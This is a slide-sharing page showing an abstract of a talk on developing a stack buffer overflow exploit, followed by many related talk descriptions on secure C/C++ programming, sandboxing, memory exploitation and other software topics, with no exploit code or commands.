This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming LanguagePatricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
Bjarne Stroustrup, the creator of C++, once said : “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” He has also said : “Within C++, there is a much smaller and cleaner language struggling to get out.” Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blows your whole leg off”.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming LanguagePatricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
Bjarne Stroustrup, the creator of C++, once said : “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” He has also said : “Within C++, there is a much smaller and cleaner language struggling to get out.” Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blows your whole leg off”.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Learning a new language is often colored by the language you come from.
As a programmer coming from C++ and Java, with some functional programming background, how did I navigate trying to get a grasp of C#? Should be fun for C# developers, but also educational: How do we teach a new language to folks that already know how to program?
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Isolating GPU Access in its Own ProcessPatricia Aas
Chromium's process architecture has graphics access restricted to a separate GPU-process. There are several reasons why this could make sense, three common ones are: Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk is the presentation of a research initiated by our research center to create a shellcode which is as easily portable between different IOS firmwares as possible and which provides a lot of pentesting features because it can dynamically change the shellcode destination at the stage of post-exploitation.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Learning a new language is often colored by the language you come from.
As a programmer coming from C++ and Java, with some functional programming background, how did I navigate trying to get a grasp of C#? Should be fun for C# developers, but also educational: How do we teach a new language to folks that already know how to program?
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Isolating GPU Access in its Own ProcessPatricia Aas
Chromium's process architecture has graphics access restricted to a separate GPU-process. There are several reasons why this could make sense, three common ones are: Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk is the presentation of a research initiated by our research center to create a shellcode which is as easily portable between different IOS firmwares as possible and which provides a lot of pentesting features because it can dynamically change the shellcode destination at the stage of post-exploitation.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old.
We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
There is hardly a Senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless the warnings of removal from future JDK releases? Are there any safe alternatives to private API or is it absolutely vital? We will review the typical cases when Java developers prefer to go unsafe and discuss major benefits and the drawbacks of it. The report will be supported by the real examples from OK.RU experience.
L'app Square Register Android ne crashe pas. Enfin... presque pas!
La recette magique? Combiner une approche aggressive avec la remontée de métadonnées et un monitoring précis. Venez découvrir les outils et techniques qui nous permettent de développer une app gérant des paiements sans mourir de trouille!
http://www.mix-it.fr/session/3532/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted in our organization we experienced several benefits: lower project setup times, better shared knowledge among team members, less wtf moments ;-)
In this session we’d like to share our experience, including but not limited to:advanced vagrantfile configurationvm configuration tips for dev environment: performance,
debug, tuning,
our wtf moments
puphet/phansilbe: hot or not?
packaging a box
seccomp is a computer security facility in the Linux kernel, pledge is a similar security facility in the OpenBSD kernel. In this presentation Giovanni Bechis will review the development story and progress of both kernel interfaces and will analyze the main differences. There will be some examples of implementations of security patches made for some important open source projects.
Return Oriented Programming, an introductionPatricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of.
In this talk you will learn how it works, and we will go through how it can be used to execute code in contexts where the stack is not executable.
TASK #1In the domain class you will create a loop that will prompt.pdfindiaartz
TASK #1
In the domain class you will create a loop that will prompt the user to enter a value of 1, 2, or 3,
which will in turn, be translated to a floor number in the game. Make sure the user only picks a
selection you are expecting (1, 2, or 3) with a while-loop. Then you will create a switch or if-else
statement. If you are more comfortable with if-else then do switch, or if you are more
comfortable with switch then do if-else. Based on the number the user chooses you will set the
floor variable to the appropriate value. When they select 1 floor should be set to 3, when they
select 2 floor should be set to 6, and when they select 3 floor should be set to 10.
TASK #2
In the domain class you will create a constructor with 6 parameters, representing all the data
loaded from the input file that was saved from a previous adventure. This constructor receives 6
parameters: aName, anAttack, aDefense, aHealth, aCurrentFloor, & aMaxFloor.
TASK #3
In the domain class you will create a save method that will allow the user to save their progress
using a PrintWriter object. This file will overwrite whatever was there before, so no need to use
FileWriter, only PrintWriter. There are 6 attributes that you need to write to the file:
name, attack, defense, health, currentFloor, & maxFloor
public void saveFile()
{
String filename = “game.txt”;
PrintWriter pw = new PrintWriter(filename);
pw.println(name);
pw.println(attack);
pw.println(defense);
pw.println(health);
pw.println(currentFloor);
pw.println(maxFloor);
pw.close();
}
TASK #4
In the driver class you will create a load method that will allow the user to pick up from where
they left off. You will do this using a File object and a Scanner object. Remember to use the File
and Scanner classes, and to close the file object after you’re done. There are 6 attributes you will
need to load from the file to successfully continue an Adventure:
name, attack, defense, health, currentFloor, & maxFloor
After you read the record from the file, and store the data in these 6 variables, you can create a
new Adventure object called JavaQuest with those 6 variables. Remember JavaQuest is a global
variable defined at the beginning of the driver class. Then, within the load method, invoke the
startAdventure() method for the newly created Adventure object.
public static void load()
{
String filename = “load.txt”;
File myFile = new File(filename);
Scanner myScan = new Scanner(myFile);
String name;
int attack, defense, health, currentFloor, maxFloor;
name = myScan.nextLine();
attack = myScan.nextInt();
myScan.nextLine();
defense = myScan.nextInt();
myScan.nextLine();
…
javaQuest = new Adventure(name, attack, defense, health, currentFloor, maxFloor);
}
javaQuest.startAdventure();
The Files
package Adventure;
import java.io.BufferedWriter;
import java.io.File;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.Random;
import java.util.Scanner;
public class Adventure
{
int health, defense, attack;
String mons.
Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."
The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.
Qualys security researchers discovered this bug and worked closely with Linux distribution vendors. And as a result of that we are releasing this advisory today as a coordinated effort, and patches for all distribution are available January 27, 2015.
Dependency Management in C++ (NDC TechTown 2021)Patricia Aas
C++ has been slow to settle on standardized tools for building and dependency management. In recent years CMake has emerged as the de facto standard for builds, but dependency management still has no clear winner. In this talk I will look into what dependency management might look like in modern C++ projects and how that relates to security.
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfPatricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
Making software products can be fraught with conflicts, where people in different roles may feel sabotaged by others. In this talk I present a model for thinking about the problems we solve and how we solve them, and using that I hope to convince you that team excellence comes from our differences, rather than in spite of them. Hopefully you'll walk away with a deeper understanding of that colleague that never writes tests, or the one that constantly complains that all you do is "make bugs".
Trying to build an Open Source browser in 2020Patricia Aas
A lot of things have been developed over the last 15 years that should make the process of making a browser easier. In this talk we will explore a bunch of different tools, platforms and libraries that could go into making a browser in 2020.
We will also see a live demo of a simple browser built with these OSS projects. We will also discuss the limitations and future work needed to make this work in practice.
Trying to build an Open Source browser in 2020Patricia Aas
A lot of things have been developed over the last 15 years that should make the process of making a browser easier. In this talk we will explore a bunch of different tools, platforms and libraries that could go into making a browser in 2020.
We will also see a live demo of a simple browser built with these OSS projects. We will also discuss the limitations and future work needed to make this work in practice.
DevSecOps for Developers, How To Start (ETC 2020)Patricia Aas
How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture?
Often the culture clash between Security and Development is even more prominent than between Development and Operations. Understanding the differences in how these functions work, and leveraging their similarities, will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Elections, Trust and Critical Infrastructure (NDC TechTown)Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Survival Tips for Women in Tech (JavaZone 2019) Patricia Aas
Being the only woman on your team can be hard. Many times it’s difficult to know what is only your experience and what is common. In this talk we’ll go through 24 tips (and a few bonus tips) based on well over a decade of experience being the only woman in several teams. If you’re a woman hopefully you’ll walk out with some ideas you can put to work right away, if you’re a man hopefully you’ll walk out with a new perspective and start noticing things in your day-to-day that you didn’t notice before.
https://patricia.no/2018/09/06/survival_tips_for_women_in_tech.html
More and more we see technology, both hardware and software, intersect with fundamental issues like privacy, democracy and human rights. The opaqueness of tech makes it a handy instrument of oppression and manipulation. We have taught the population to trust us. We have constructed a world in which they have to exist, with little to no oversight or transparency. We build critical infrastructure on hardware and software that even we cannot audit. How can we wield that responsibility? How do we protect those that speak up? How do we protect the population?
Keynote: Deconstructing Privilege (C++ on Sea 2019)Patricia Aas
Can you describe a situation that caused you to realize you were privileged?
I have asked many people that question now, and what I have learned is that privilege is an Unconscious Incompetence. Being privileged is a non-event. When we become conscious of it we realize that our privileged experience is not applicable to less privileged people. What happens to them does not happen to us. Only when we become Consciously Incompetent do we realize the need to listen. We need to learn.
In this talk I hope to make you realize that we all have privilege and to start a journey through self reflection to becoming Consciously Incompetent. I hope also to give some indicators and patterns that you can look for in your daily lives to recognize and maybe even to correct imbalances you see.
Trying to prepare your project or organisation to be able to receive vulnerability reports is a daunting task. And often far more complex and cross disciplinary than one first expects.
This talk describes some of the most common challenges and how to counteract them.
Why Is Election Security So Hard? (Paranoia 2019) Patricia Aas
What makes the domain and requirements of elections so difficult to solve with computers? In this talk we will go through a lot of the requirements of an election and what motivates them, and show how computers surprisingly often introduce more vulnerabilities than they solve when applied to elections.
Reading Other Peoples Code (NDC Copenhagen 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully, you will walk away with a plan on how to approach a new code base. But even more, I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture? We will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
Reading Other Peoples Code (NDC London 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Shahin Sheidaei
Games are powerful teaching tools, fostering hands-on engagement and fun. But they require careful consideration to succeed. Join me to explore factors in running and selecting games, ensuring they serve as effective teaching tools. Learn to maintain focus on learning objectives while playing, and how to measure the ROI of gaming in education. Discover strategies for pitching gaming to leadership. This session offers insights, tips, and examples for coaches, team leads, and enterprise leaders seeking to teach from simple to complex concepts.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
Accelerate Enterprise Software Engineering with PlatformlessWSO2
Key takeaways:
Challenges of building platforms and the benefits of platformless.
Key principles of platformless, including API-first, cloud-native middleware, platform engineering, and developer experience.
How Choreo enables the platformless experience.
How key concepts like application architecture, domain-driven design, zero trust, and cell-based architecture are inherently a part of Choreo.
Demo of an end-to-end app built and deployed on Choreo.
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Globus
Large Language Models (LLMs) are currently the center of attention in the tech world, particularly for their potential to advance research. In this presentation, we'll explore a straightforward and effective method for quickly initiating inference runs on supercomputers using the vLLM tool with Globus Compute, specifically on the Polaris system at ALCF. We'll begin by briefly discussing the popularity and applications of LLMs in various fields. Following this, we will introduce the vLLM tool, and explain how it integrates with Globus Compute to efficiently manage LLM operations on Polaris. Attendees will learn the practical aspects of setting up and remotely triggering LLMs from local machines, focusing on ease of use and efficiency. This talk is ideal for researchers and practitioners looking to leverage the power of LLMs in their work, offering a clear guide to harnessing supercomputing resources for quick and effective LLM inference.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work the team is investigating ways to speedup the time to solution for many different parts of the DIII-D workflow including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
Why React Native as a Strategic Advantage for Startup Innovation.pdfayushiqss
Do you know that React Native is being increasingly adopted by startups as well as big companies in the mobile app development industry? Big names like Facebook, Instagram, and Pinterest have already integrated this robust open-source framework.
In fact, according to a report by Statista, the number of React Native developers has been steadily increasing over the years, reaching an estimated 1.9 million by the end of 2024. This means that the demand for this framework in the job market has been growing making it a valuable skill.
But what makes React Native so popular for mobile application development? It offers excellent cross-platform capabilities among other benefits. This way, with React Native, developers can write code once and run it on both iOS and Android devices thus saving time and resources leading to shorter development cycles hence faster time-to-market for your app.
Let’s take the example of a startup, which wanted to release their app on both iOS and Android at once. Through the use of React Native they managed to create an app and bring it into the market within a very short period. This helped them gain an advantage over their competitors because they had access to a large user base who were able to generate revenue quickly for them.
First Steps with Globus Compute Multi-User EndpointsGlobus
In this presentation we will share our experiences around getting started with the Globus Compute multi-user endpoint. Working with the Pharmacology group at the University of Auckland, we have previously written an application using Globus Compute that can offload computationally expensive steps in the researcher's workflows, which they wish to manage from their familiar Windows environments, onto the NeSI (New Zealand eScience Infrastructure) cluster. Some of the challenges we have encountered were that each researcher had to set up and manage their own single-user globus compute endpoint and that the workloads had varying resource requirements (CPUs, memory and wall time) between different runs. We hope that the multi-user endpoint will help to address these challenges and share an update on our progress here.
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamtakuyayamamoto1800
In this slide, we show the simulation example and the way to compile this solver.
In this solver, the Helmholtz equation can be solved by helmholtzFoam. Also, the Helmholtz equation with uniformly dispersed bubbles can be simulated by helmholtzBubbleFoam.
Modern design is crucial in today's digital environment, and this is especially true for SharePoint intranets. The design of these digital hubs is critical to user engagement and productivity enhancement. They are the cornerstone of internal collaboration and interaction within enterprises.
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Anthony Dahanne
Les Buildpacks existent depuis plus de 10 ans ! D’abord, ils étaient utilisés pour détecter et construire une application avant de la déployer sur certains PaaS. Ensuite, nous avons pu créer des images Docker (OCI) avec leur dernière génération, les Cloud Native Buildpacks (CNCF en incubation). Sont-ils une bonne alternative au Dockerfile ? Que sont les buildpacks Paketo ? Quelles communautés les soutiennent et comment ?
Venez le découvrir lors de cette session ignite
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
top nidhi software solution freedownloadvrstrong314
This presentation emphasizes the importance of data security and legal compliance for Nidhi companies in India. It highlights how online Nidhi software solutions, like Vector Nidhi Software, offer advanced features tailored to these needs. Key aspects include encryption, access controls, and audit trails to ensure data security. The software complies with regulatory guidelines from the MCA and RBI and adheres to Nidhi Rules, 2014. With customizable, user-friendly interfaces and real-time features, these Nidhi software solutions enhance efficiency, support growth, and provide exceptional member services. The presentation concludes with contact information for further inquiries.
Experience our free, in-depth three-part Tendenci Platform Corporate Membership Management workshop series! In Session 1 on May 14th, 2024, we began with an Introduction and Setup, mastering the configuration of your Corporate Membership Module settings to establish membership types, applications, and more. Then, on May 16th, 2024, in Session 2, we focused on binding individual members to a Corporate Membership and Corporate Reps, teaching you how to add individual members and assign Corporate Representatives to manage dues, renewals, and associated members. Finally, on May 28th, 2024, in Session 3, we covered questions and concerns, addressing any queries or issues you may have.
For more Tendenci AMS events, check out www.tendenci.com/events
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTier1 app
